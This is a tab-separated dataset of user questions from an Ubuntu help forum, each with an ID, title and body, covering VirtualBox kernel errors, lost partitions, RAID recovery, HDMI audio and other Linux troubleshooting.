469051	virtual box kernel error	i am using kubuntu in my laptop i have installed virtual box in kubuntu 14.04 lts but when i start virtual machine it gives me error : failed to open a session for the virtual machine ub . vt-x is disabled in the bios . ( verr_vmx_msr_vmxon_disabled ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 8ab7c520-2442-4b66-8d74-4ff1e195d2b6 details of my kubuntu is linux tank-pc 3.13.0-27-generic # 50-ubuntu smp thu may 15 18:06:16 utc 2014 x86_64 x86_64 x86_64 gnu/linux and while installing i got error about kernal version sudo apt-get install virtualbox reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : dkms fakeroot libfakeroot libgsoap4 virtualbox-dkms virtualbox-qt suggested packages : dpkg-dev debhelper virtualbox-guest-additions-iso vde2 the following new packages will be installed : dkms fakeroot libfakeroot libgsoap4 virtualbox virtualbox-dkms virtualbox-qt 0 upgraded , 7 newly installed , 0 to remove and 0 not upgraded . need to get 21.3 mb of archives . after this operation , 86.1 mb of additional disk space will be used . do you want to continue ? [ y/n ] y get:1 http : //archive.ubuntu.com/ubuntu/ trusty/universe libgsoap4 amd64 2.8.16-2 [ 525kb ] get:2 http : //archive.ubuntu.com/ubuntu/ trusty/multiverse virtualbox amd64 4.3.10-dfsg-1 [ 15.5 mb ] get:3 http : //archive.ubuntu.com/ubuntu/ trusty/main dkms all 2.2.0.3-1.1ubuntu5 [ 64.4 kb ] .0 kb/s 3min 33s get:4 http : //archive.ubuntu.com/ubuntu/ trusty/multiverse virtualbox-dkms all 4.3.10-dfsg-1 [ 538 kb ] get:5 http : //archive.ubuntu.com/ubuntu/ trusty/multiverse virtualbox-qt amd64 4.3.10-dfsg-1 [ 4,592 kb ] get:6 http : //archive.ubuntu.com/ubuntu/ trusty/main libfakeroot amd64 1.20-3ubuntu2 [ 25.4 kb ] get:7 http : //archive.ubuntu.com/ubuntu/ trusty/main fakeroot amd64 1.20-3ubuntu2 [ 55.0 kb ] fetched 21.3 mb in 4min 15s ( 83.5 kb/s ) selecting previously unselected package libgsoap4 : amd64 . ( reading database ... 152414 files and directories currently installed . ) preparing to unpack ... /libgsoap4_2.8.16-2_amd64.deb ... unpacking libgsoap4 : amd64 ( 2.8.16-2 ) ... selecting previously unselected package virtualbox . preparing to unpack ... /virtualbox_4.3.10-dfsg-1_amd64.deb ... unpacking virtualbox ( 4.3.10-dfsg-1 ) ... selecting previously unselected package dkms . preparing to unpack ... /dkms_2.2.0.3-1.1ubuntu5_all.deb ... unpacking dkms ( 2.2.0.3-1.1ubuntu5 ) ... selecting previously unselected package virtualbox-dkms . preparing to unpack ... /virtualbox-dkms_4.3.10-dfsg-1_all.deb ... unpacking virtualbox-dkms ( 4.3.10-dfsg-1 ) ... selecting previously unselected package virtualbox-qt . preparing to unpack ... /virtualbox-qt_4.3.10-dfsg-1_amd64.deb ... unpacking virtualbox-qt ( 4.3.10-dfsg-1 ) ... selecting previously unselected package libfakeroot : amd64 . preparing to unpack ... /libfakeroot_1.20-3ubuntu2_amd64.deb ... unpacking libfakeroot : amd64 ( 1.20-3ubuntu2 ) ... selecting previously unselected package fakeroot . preparing to unpack ... /fakeroot_1.20-3ubuntu2_amd64.deb ... unpacking fakeroot ( 1.20-3ubuntu2 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for shared-mime-info ( 1.2-0ubuntu3 ) ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... setting up libgsoap4 : amd64 ( 2.8.16-2 ) ... setting up virtualbox ( 4.3.10-dfsg-1 ) ... * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ] invoke-rc.d : initscript virtualbox , action `` restart '' failed . setting up dkms ( 2.2.0.3-1.1ubuntu5 ) ... setting up libfakeroot : amd64 ( 1.20-3ubuntu2 ) ... setting up fakeroot ( 1.20-3ubuntu2 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode processing triggers for ureadahead ( 0.100.0-16 ) ... setting up virtualbox-dkms ( 4.3.10-dfsg-1 ) ... loading new virtualbox-4.3.10 dkms files ... first installation : checking all kernels ... building only for 3.13.0-27-generic building initial module for 3.13.0-27-generic done . vboxdrv : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.13.0-27-generic/updates/dkms/ vboxnetadp.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.13.0-27-generic/updates/dkms/ vboxnetflt.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.13.0-27-generic/updates/dkms/ vboxpci.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.13.0-27-generic/updates/dkms/ depmod ... ... ... .. dkms : install completed . * stopping virtualbox kernel modules [ ok ] * starting virtualbox kernel modules [ ok ] setting up virtualbox-qt ( 4.3.10-dfsg-1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... help me guys ... every answer will be appreciated thank you
469052	where does plex media server store its cache/settings ?	i just want to know where to find the cache/settings locations for plex media server ? i just want to save it in case i need to reformat my drive . i 'm not sure if it matters but i am using ubuntu 14.xx . and i installed plex by downloading the .deb package that 's available on its site . the one of the repo is too old . thanks very much
469058	problem in time shown by pc	since i loaded ubuntu 14.04 and windows8.1 on my pc , the desktop of none of them keeps proper time . i tried setting the time many times but it is not maintained when i switch on my pc after some time . please help
469061	install ubuntu 14.04 over 11.10 from cd or usb	in my laptop i have first installed windows 7 . then , installed ubuntu 11.10 . now my laptop contains two operating systems . i do n't have internet connectivity in home . but i have ubuntu 14.04 iso with me , i need to upgrade ubuntu 11.10 with ubuntu 14.04 without uninstalling windows 7 and ubuntu 11.10 . how to achieve this ... please help..am new one to ubuntu .
469062	cant mount windows phone 8 with kubuntu 14.04	i am trying to mount my windows phone 8 with my kubuntu 14.04 but i can not get access to it . i have mounted my phone in fedora 20 with gnome 3.10 and ubuntu 13.10 but it not seem possible with dolphin .
469063	kernel panic while installing ubuntu 14.04	i was trying to install ubuntu 14.04 via a pendrive on my laptop and i keep on getting a `` kernel panic '' error . i think it is mostly a hardware issue because earlier it had windows installed and after a few months , the system started hanging real bad ( not the usual windows degradation ) . i am a long time ubuntu user so decided to install ubuntu on the laptop . however , it keeps on failing . i even tried install xubuntu and it also fails . also , i could not figure out how to get the complete trace and hence clicked a photo of the console . if you need a complete log , it would be great if you can tell me what i need to do to capture it . you can see the error at http : //i.stack.imgur.com/grzor.jpg
469064	slow performance on lxde due to power setting	i was very happy with my lxde running on my dell xps 13 until , a few days ago , i found myself confronted with a dialgue box that presented the choices `` desktop '' or `` laptop '' . it was set to `` desktop '' , but i thought to myself `` gosh , that can not be correct '' and so i set it to `` laptop '' and forgot about it . a while later i began to experience problems with massive lag and slowdowns that i had never experienced before . i thought they were related to other issues but i have since discovered that plugging my laptop into external power seems to cure the problem instantly , and so i am coming to realise that i inadvertently messed something up . the problem is that i do not remember where this dialogue box arose nor ( exactly ) what it was controlling . can anybody indicate what i might have messed with and how to rectify it ? i 'm sure the dastardly setting was within one or two clicks of the lxde main menu . ( preferences > power manager would seem to be an obvious candidate but it tosses up dialogue box about xfce4-power-manager not being loaded which i do not recall seeing when i messed things up , and even if i choose to load it i later get an error message about being unable to connect to it . )
469065	tarball to another drive	i 'm just creating a tarball of a corrupted usb ntfs windows drive which i mounted in /media . instead of creating the tarball in on the drive itself /dev/sdb2 i wish to have it created on my own drive /dev/sda . what 's the correct output ?
469068	lightdm remote login disappeared ( ubuntu 14.04 )	after some update , in the login screen , the option for the remote login disappeared . what should i do to restore the option ?
469072	ubuntu 12.04 hangs at login screen , ubuntu 14.04 works ok	i have used ubuntu for several years , and i have installed ubuntu 14.04 lts earlier , and just installed ubuntu 12.04 lts alongside , and ubuntu 12.04 lts does not work properly . it hangs at the login screen . i tried to fix it from the tty2 console . i entered : sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install -- reinstall unity sudo apt-get install -- reinstall lightdm startx but it still does not work properly , and i have also tried enter reboot from root . i think maybe it is a network issue , and it is saying that wlan0 is not ready , and can someone please help ?
469074	to create a website adress for educational purpose	i want to open a website . what will i have to do ? will i purchase ip from isp first ? if yes . how can i get it ? what is the easiest procedor for creating a website ? please give me appropriate answer to complete it with your kind help !
469079	how to get the mint theme for cinnamon in ubuntu ?	the cinnamon in mint has a nice theme called mint . is there any way of getting it on ubuntu ? and also , my can icon 's text looks black on cinnamon . is there any way to make the text white ?
469080	lost all my partition after installing ubuntu 14.4 lts	yesterday i installed ubuntu 14.04 lts with a bootable pendrive . before that i had 3 partitions on my windows system ( c : , d : , and e : ) . during the installation process i thought it would be the same as windows where it formats the c : drive and that linux gets installed in c : . i chose the second option where it said erase disk and install ubuntu . now i can not find any of my drives . i have read hundreds of threads in this forum and tons of youtube tutorial to retrieve it by using testdisk but could not figure it out . when i use it with liveusb it shows two storage systems . when i run ( disks ) from the application the result shows : disk drives : 500gb hard disk hitachi hts727550a9e364 size:500gb partitioning : master boot record device : /dev/sda1 partition type : linux bootable contents : ext2 ( version 1.0 ) not mounted and below disk drives section there is other devices which has : 491gb block device 8.5gb block device 967mb loop device and when i run fdisk -l it shows : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00045999 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 976771071 488134657 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 501760 976771071 488134656 8e linux lvm disk /dev/mapper/ubuntu -- vg-root : 491.3 gb , 491333353472 bytes 255 heads , 63 sectors/track , 59734 cylinders , total 959635456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 8464 mb , 8464105472 bytes 255 heads , 63 sectors/track , 1029 cylinders , total 16531456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table disk /dev/sdb : 15.9 gb , 15925772288 bytes 64 heads , 32 sectors/track , 15188 cylinders , total 31105024 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x20ac7dda this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 ? 3224498923 3657370039 216435558+ 7 hpfs/ntfs/exfat /dev/sdb2 ? 3272020941 5225480974 976730017 16 hidden fat16 /dev/sdb3 ? 0 0 0 6f unknown /dev/sdb4 50200576 974536369 462167897 0 empty partition table entries are not in disk order how do i recover my partitions ?
469081	how to share screen/window with a remote user ?	i would like to share my screen or only a window with a remote user , something like skype screen shearing . is there any tool in ubuntu that i can use to easily do this ?
469083	returning from ubuntu sdk full screen mode	i have a little problem in switching back to normal mode with ubuntu-sdk ide . esc does n't work ? ? ?
469085	anybody notice that ubuntu 14.04 is extremly slow when you connect a usb flash drive or usb external drive ?	if i remember correctly in older versions of ubuntu a usb flash drive icon would appear on the desktop and it would mount by itself so that you would gain access to the files right away . i have ubuntu 14.04 installed and every time i connect my flash drive or a external drive it takes a long time to show up on the desktop and when it does show up i have to open nautilus and right click on the drive and tell it to mount and it takes a long time to mount , that never use to happen in the older versions of ubuntu . what can i do to get it to work like it use to and i do n't want to automount at startup , i just want to plug in my drive when i 'm at the desktop and have it working like it used to . thank you
469089	killing several processes	i have one command ( /usr/lib/r/exec/r pathtodifferentfiles ) being executed with many different arguments ( file names ) . looking at htop , i see at least 30 processes created , i want to kill all of them at the same time . is there a way to kill processes that apply a command starting with a pattern ? ( /usr/lib/r/exec/r )
469091	matlab 2009 installition isssue on ubuntu 14.04lts	recently my university has started a course on matlab . i have no pre-knowledge about this course as well as the software called matlab ! and all the computers in my universities computer lab runs on windows 7 and having matlab 2009 ! i searched for a couple of hours about the installation method of matlab 2009 on ubuntu 14.04 and got no complete instruction on it ! can anybody help me with complete instruction ? thanks in advance .
469092	surface pro/micro sd performance comparison question	i installed ubuntu 14.04 on my microsd . i put / on 15 gig partition and /boot on 1 gig partition on the hard drive . memory never gets past 2 gig but i created a swap just because . i ca n't figure out why the cpu is maxed out so easily . googling an image and scrolling will cause cpu to reach 100 % and freeze . i tried reinstalling on my recovery partition , same result . i get better performance when running ubuntu on a usb . i 'm assuming this has something to do with read/write of the sd . any suggestions ?
469095	how to install gnome in ubuntu 14.04	is there a way to install gnome on trusty tahr ?
469096	how to fix dual-boot installation of ubuntu 14.04 alongside win7 ?	i tried to install ubuntu 14.04 alongside windows 7 ultimate and completely messed up . i downloaded the file and burned a cd . got confused with the partitioning because i wanted to install it in my drive d once my drive c is a corsair force gt ata device , 120gb and has only 39gb free . the drive d is 2tb and is completely empty . i had created 2 partitions in the drive d both 500gb big and the remaining 800gb were not partitioned . after the installation i got a 19gb partition that seems to be equally empty . i can not at all see where ubuntu is installed because i can not identify any file . if i boot from the installation cd , it says that ubuntu 14.04 is already installed - but where ? i ordered a new cd from canonical . does it contain an uninstall program ? is it actually possible to install in a second disk ( drive d ) ? if so can i make the second disk bootable so that i can start it from bios without touching windows ? the computer is high-end and very powerful . thanks .
469104	why do hidden comments from excel file are automatically seen in libre office spreadsheet ?	hidden comments from microsoft excel file are automatically seen in libre office spreadsheet . i do not know what command to use and just manually hide one by one the comments .
469105	usb ports do n't work during installation .	i am a new user and i have windows 7 . i tried to install ubuntu 14.10 , i have done it before with success , but my keyboard , mouse and wifi antenna were n't working . they are all connected in usb ports . i download two different versions , i think they were 13.10 and 12.04 , but the same thing happened . this was by a cd installation . i tried a bootable usb flash drive , but of course it would n't even launch the installation . for some reason it wo n't recognize my usb ports and i ca n't do much to fix it , since i do n't have internet without a usb port . does anyone have any insight ? i think this kind of question has been asked before , but i was n't able to apply the solutions proposed , since i could n't even use my keyboard . my system is pretty good , and i only have one ps/2 port . thank you , and if it has been asked and solved , i am terribly sorry and i will delete the post . cheers .
469108	crashed upgrade form 13.10 to 14.04	today , i turned on my computer and upgrade ubuntu to 14.04 , since it is so long , so i went to have dinner . when i 'm back , the screen freeze ( i tried to move my mouse , but the mouse icon moved a few minutes later ) . i left it for an hour and finally force reboot the computer . i searched in forums and found a way to continue the upgrade ( enter recovery mode shell and dpkg -- configure -a however , when i reboot the computer again , the screen resolution seemed to be increased ( the images looked to be more meticulous ) but after i login , the mouse responded slower than that before update . the system also seemed to be laggy . after few minute my cpu reached 70째c ! ! ! ( that 's my bios alarm ) , also , there is a small icon on the upper bar showing something like `` ... packet damaged ... type apt-get in terminal '' some thing like this , after i did sudo aptitude build-dep , showing a lot on unsolved dependence . i do n't know what to do to or if there is `` reupgrade command '' please help ! edit : after successfully solve dependence , i found out the following problems : 1 . no hardware acceleration ( poor graphics with high cup usage , i can only set the resolution lower to prevent cup burn ) , however i tried to install driver again , not helping . 2 . play.ape file in cmus will crackling , noise will come out when playing .m4a ( however , they can be played in vlc , but my bios scream for high temperature again after i play a few songs ... ) i think i left some important packages during this damaged upgrade .
469111	how do i get a version of ubuntu for pentium m ?	i have an asus notebook which i am trying to run ubuntu on . it has a pentium m processor running in it . so when i try to install ubuntu 13.10 it asks me to install an appropriate kernel for this old asus m6000 of mine . it is not provided on the disk , despite being made for older systems . i want to make it into a file server but i ca n't because of this error . i am only a novice at this . it is my 2nd ubuntu build .
469114	is it possible to install ubuntu server ( 12.04 ) on gpt disk ( 3tb ) and boot from it	i have been searching for a guide on how to install ubuntu server on 3tb gpt partition , but with no luck . i wonder if it is even possible ? i read that gpt can not be used to boot with . also , i would like to use lvm on that drive , so in my case i would have 2*3tb drives with with ubuntu server on it and extended partition with lvm for use of large amount of files . i 'm new to linux so i hope its not a dumb question .
469115	ubuntu slow - ubuntu based distros fast	i always wanted to use ubuntu as my main operating system - mainly because of unity . unfortunately i ca n't . whenever i install ubuntu on my pc , ubuntu is running as slow as my grandma . i have tried different versions of ubuntu ( 14.04 , 12.04 ) , wubi and running in virtualbox ( from windows 7 ) . they where all extremely slow , way slower than windows . i then tried elementary os , which should be faster . and it was - it was running like a dream , almost instant boot , fast program startup , etc . now i 'm using pinguy os , which is running fine also . i just have no idea why ubuntu does n't work - because distros based on ubuntu apprently are working fine . ( arch linux is running fine also ) could this be because my hardware ( listed below ) does n't work with unity , or ... ? just hoping someone can explain this , not necessarily a solution . hardware cpu : intel i5 3570 ( non k version ) gpu : asus gtx 670 motherboard : asus p8b75-m ram : 8gb kingston nothing has ever been overclocked or anything , and it 's running fine in windows ... summary why does ubuntu run slow , when ubuntu based distros , arch linux and windows run normally ? unity incompatible hardware ?
469118	problem with gnuplot	i want to draw graphs with gnuplot . but when i click the button for the example plot sin ( x ) , the gnuplot command window does not appear . i do n't know the cause of that behavior
469120	is there a driver available for thinkpad t540p fingerprint reader	the open source drivers supported by ubuntu do not cover the reader included with this computer and the launchpad project to supply such drivers appears to be dormant . the reader is supplied by a company called upek and supposedly there are ubuntu drivers available somehwere but the lenovo 's link to upek does not show me any linux drivers .
469124	openvpn is not working in ubuntu 14.04	i am using ubuntu 14.04 in my sony e series laptop but openvpn is not working in lastest version of ubuntu..i used openvpn in 13.10 and it worked perfectly but in 14.04 its not working > : ( please suggest me solution of this problem .
469127	how to make solver work in excel [ playonlinux install ]	because for school i have to work with excel , i installed microsoft office 2010 with playonlinux . office is working great , except when i try to use the solver function in excel . the moment i activate solver , excel simply shuts down . when i restart excel , it comes up with the following message : excel experienced a serious problem with the 'solver add-in ' add-in . if you have seen this message multiple times , you should disable this add-in and check to see if an update is available . do you want to disable this add-in ?
469129	volume level not remembered after shutdown/restart	i 'm using ubuntu 14.04 and the volume level always starts at 100 % when i turn on the computer . is there a way for the volume level of the previews session be remembered in the new session ? ( and can the brightness level also be remembered ? )
469130	byobu screen default for all users	i have installed byobu in my ubuntu 12.04 server installation and set as backend to use screen . what i am trying to do without success is to have all users on my system to use byobu having also screen as default . i have tried to use byobu-select-backend , but this will change the setting only for the user issuing the command and not all . i do n't want to edit for every user on the system manually the .byobu/backend , but what i am trying to achieve is when i install it , i.e as a root user this setting to be applied for all users on the system . thank you all in advance . regards . kostasp
469133	fix write-protected ( read-only ) filesystem	i made bootable usb drive , then usb drive was write protected . i used followng command hrirks @ hrirks-ms-7592 : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000cd3ed device boot start end blocks id system /dev/sda1 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 * 206848 125849426 62821289+ 83 linux /dev/sda3 125851648 777533439 325840896 7 hpfs/ntfs/exfat /dev/sda4 777533440 976771071 99618816 5 extended /dev/sda5 945315840 976771071 15727616 83 linux /dev/sda6 777535488 945313791 83889152 7 hpfs/ntfs/exfat partition table entries are not in disk order disk /dev/sdb : 8179 mb , 8179941376 bytes 252 heads , 62 sectors/track , 1022 cylinders , total 15976448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x12108eb8 disk /dev/sdb does n't contain a valid partition table now gparted does not shows the device , but i can see drive in unity disk manager what should i do now , to fix those errors ?
469135	virtual hotspot and vpn	i created an hotspot wireless with this script : http : //www.webupd8.org/2013/06/how-to-set-up-wireless-hotspot-access.html . all work fine . now i would create a vpn and share the vpn with all mobile devices that i will connect in wireless . how can i do ?
469138	how to get genome 3 on ubuntu 14.04 lts 64 bit	i dont know that whether i am using unity launcher or any other launcher but it is clear that i have never made any changes in my ubuntu but now i want to get genome 3 in my desktop can any one give me a sequence of commands to get it installed currently my launcher looks like this and i am not getting any minimise button for the window is there any solution for this answer will reinstalling ubuntu fix the problem
469139	raid6 will not reassemble with 2 failed disks	relevant photo album hello all . i have a file server running ubuntu 12.04 ( see first picture ) with 6x seagate 3tb hdds in a raid 6 configuration ( giving 12tb of storage ) . this is a software raid , created from within the o/s . unfortunately , one of the disks failed , so i need to find out which one it is and replace it . i took the one i thought was failed out and plugged it into my windows machine , which formatted it to ntfs . this turned out to be a disk that was ok , however . so now i have 2 drives missing ( one failed , one reformatted ) . a raid6 should be able to withstand 2 failed drives , so i am confused as to why i ca n't rebuild the array in its degraded state ? it wo n't start using the disk utility , and i ca n't get it to do anything if i run sudo mdadm -- assemble -- scan or sudo mdadm -- assemble /md/0 so i tried stopping the array using sudo mdadm -- stop /dev/md0 which is fine , and stops the array . so i tried assembling it using the 4 working drives : sudo mdadm -- assemble /dev/md0 /dev/sdb1 /dev/sdc1 /dev/sde1 /dev/sdf1 to which i got the reply mdadm : /dev/md/0 assembled from 1 drive - not enough to start the array any help gratefully received , and i am obviously happy to try to answer any questions you may have . thanks in advance .
469141	samba : unstable access to shares - invalid argument	i 'm on ubuntu 14.04 , i 'm having some problems with smb shares , they work fine but after some time , they get unacessible , the error thrown is invalid argument , any of you had this problem ? thanks in advance
469142	ubuntu 14.04 ( trusty tahr ) pxe netboot gives live-installer error	i got an annoying issue while updating my automated ubuntu installer with ubuntu 14.04 ( trusty tahr ) . i have a razor based ( using ipxe ) based network boot process to automatically install and configure ubuntu server instances . the server to be installed will pxe boot and then get the installation files and preseed configuration file via http . this worked well for prior 12.04 releases . now i configured my razor-server for 14.04 and i am getting following error https : //flic.kr/p/newbos looking at the installation log : i found error : could not find any live images . i found one solution on internet to add below line in all the preseed file present in install directory . d-i live-installer/net-image string http : //xx.xx.xx.xx/trusty-server-amd64/install/filesystem.squashfs
469143	how to enable root access on ubuntu 14.04	i´d like to enable the ssh root access on ubuntu 14.04 . editing the /etc/ssh_config ( permitrootlogin yes ) didn´t affect anything
469148	migration from windows to ubuntu ( 14.04 )	i need to move a network with 70 internal clients and 9 servers from windows to ubuntu linux , at zero cost . i 've already moved : sql server to postgresql , exchange to postfix ( iredmail ) , file services to samba ( temporary ; iscsi after clients conversion ) , roadblocks : ati 4650 video on 60 acer laptops , any service pack for ubuntu 14.04 ( 12.04 worked great ) ? on server side to many options and overlapping or lack of features , which would be your recommandation for replacing : -system center configuration manager -unified threat management thank you , j
469153	how to connect to an ssh server in order to access files on a lan pc ?	in trusty ( 14.04 ) , nautilus ( 1:3.10.1-0ubuntu9 ) no longer gives option in ‘connect to server’ to specify type e.g . ssh & user/password . what is the workaround , without using the cli , to connect to an ssh server in order to access files on a lan pc ?
469157	ubuntu vm does not detect external disk attached to host .	i have install ubuntu on vm using this guide - http : //www.wikihow.com/install-ubuntu-on-virtualbox install went o.k - and it 's working but when i connect an external hard disk - it 's wo n't show me it . i have try to connect it before i run the vm , and also after the system is up - nothing what can i do ? am i missing anything ? did n't install correctly ?
469159	how do i run fasm 1.71.17 in xubuntu 13.04	hello , i am a novice at using linux i am using xubuntu off of a flash drive and i am wondering how do i run the fasm executable i have already opened the properties dialog and went underneath the permissions tab and selected the option that said `` allow this file to run as an executable '' . i have tried double clicking on it , it did not open the process did not show up on task manager . i am wondering is this a console application . here is the fasm website
469168	how to convert a wav to mp3 in audacity	i am trying to export a wav format file to an mp3 format in audacity , but when it 's done exporting all that is does is make this screaching sound for about two seconds and then there is no sound at all . i have learned so much from frequent use of this site , thank you in advance for all of your help .
469171	pngquant 2.0 for ubuntu 12.04 not available	i could not find pngquant 2.0 to install in ubuntu 12.04 . i have tried version 1.0 but it has got some bugs .
469173	how do the security features in ubuntu differ from debian ?	i am on the debian security mailing list , and recently there has been a lot of traffic going back and forth about the security ( particularly package updates ) of ubuntu vs debian stable . a guy on the lists asked this : i 'm a new user of the great debian distro for my desktop . but when i talked to a friend and i told him , that i 'm using debian ( wheezy ) for my desktop computer , he told me that i shoud n't use it because it is not secure . he told me to use ubuntu instead . he explained that with the fact , that ubuntu has more security features enabled than debian ( also more compiler flags for security ) in a fresh install . he gave me a link to the following site : https : //wiki.ubuntu.com/security/features so , i 'm very happy with debian but because my friend seems to be an expert for linux , i do n't know if i can use debian . can you tell me which of the security features promoted by ubuntu are also enabled in debian ? i was wondering if anyone had their two bits to add ...
469174	custom keyboard layout not showing in settings	i am trying to create a new keyboard layout where two keys are inverted with each other . this is what i have done : edit /usr/share/x11/xkb/symbols/se to add : partial alphanumeric_keys xkb_symbols `` kinesis '' { // modifies the basic swedish layout to place aring correctly include `` latin ( type2 ) '' include `` se ( basic ) '' name [ group1 ] = '' swedish ( kinesis ) '' ; key < bksl > { [ aring , aring ] } ; key < ad11 > { [ apostrophe , asterisk , acute , multiply ] } ; } ; edit /usr/share/x11/xkb/rules/evdev.lst to add to the section ! variant : kinesis se : swedish ( kinesis ) restarted x . this mentions something about rules/evdev.html , which i do not have ( ubuntu 14.04 ) . it mentions also `` adding the file '' , but i did not create any new file , only completed the existing symbols/se . i also tried to clear /var/lib/xkb from *.xkm , no difference . how do i make this new variant of the layout to show up in my settings- > text entry ?
469183	btrfs snapshot marked as deleted	i am using btrfs v3.12 and each time i delete a snapshot it is not deleted , marked as `` deleted '' but the global size of the volume does n't change . i have never seen that in older version of btrfs . /sbin/btrfs subvolume delete /data/snapshot/my_snap /data/numbackup # btrfs subvolume list /data id 258 gen 134150 top level 5 path snapshot id 4889 gen 92998 top level 0 path deleted is that a new and normal behavior of btrfs ? best regards
469184	writing iso to disk	in win8 when i right click on the .iso file , ( write to disc ) does not appear . how do i write the .iso file to a dvd properly ?
469189	tried factory resetting computer , crashed	i have an asus eeepc 1201ha , with windows 7 starter , and ubuntu 12.04 lts via wubi . i tried to factory reset it , but when i did , it started saying bootmgr is missing , and now it only shows a blinking cursor ( underscore ) , when i turn it on . i 've factory resetted it before , and this is the first this has happened , could it have something to do with wubi being installed whilst i tried to reset it ?
469190	maas , juju , virtualbox 4.3 and virsh command	i 've a problem with libvirt 1.2.2 and virtualbox 4.3 . after installing ubuntu 14.04 server and setting maas and juju , i need to use virsh to see the list of my installed vm ( as reported in the guide how to configure maas to be able to boot virtual machines . ) i 've also created 2 other nodes and set maas server correctly , but when trying to use virsh to see the list of the installed vm i do n't receive any list . the command is that : sudo virsh list -- all while , if i run this sudo virsh -c vbox : ///session the answer is that libvir : error : could not connect to vbox : ///session error : failed to connect to the hypervisor is there someone , who have had the same issue and how to resolve it ?
469192	raid1 `` conflicting device node '' message on startup	i 'm dual booting win8.1 and ubuntu 14.04 ( gnome classic ) . i have raid1 set up ( on asus z87-a motherboard ) with win partition , ubuntu partition , and ntfs partition for data . on ubuntu startup , i see messages : conflicting device node '/dev/mapper/isw_bdjiccgcbg_array1p6 ' found , link to '/dev/dm-6 ' will not be created conflicting device node '/dev/mapper/isw_bdjiccgcbg_array1p6 ' found , link to '/dev/dm-6 ' will not be created when i start gparted , i get following error messages : could not stat device /dev/mapper//dev/sbd : `` pdc '' and `` isw '' formats discovered ( using isw ) ! - no such file or directory could not stat device /dev/mapper//dev/sda : `` pdc '' and `` isw '' formats discovered ( using isw ) ! - no such file or directory however , i have no problems mounting and using ntfs partition . are those messages something i should worry about ?
469196	ca n't set hdmi audio as default device	i 've got a new laptop with an nvidia gt750m graphics chip , and ca n't seem to get hdmi audio output working . an option for 'hdmi/displayport ' audio output is in my sound menu , but no test sounds will play through it . the output of my aplay -l is : kj @ kj-laptop : ~ $ aplay -l **** list of playback hardware devices **** card 0 : hdmi [ hda intel hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc668 analog [ alc668 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 when i issue the following for the first time , i hear nothing kj @ kj-laptop : ~ $ aplay -d plughw:0,3 lel.wav but if i run the command again , from there on after it works and the file is played through my hdmi attached speakers . i therefore added the following line to my /etc/pulse/default.pa load-module module-alsa-sink device=hw:0,3 this caused an additional device to appear in my sound options called 'built-in audio ' , but after selecting it the test sounds do n't play and hdmi audio still does n't work for other apps . i get the feeling that this is close to working , since i can actually play stuff by manually specifying the device . just looking for some help with the last step ! i have the proprietary driver installed , and configured to use the built-in intel graphics rather than the discrete chip .
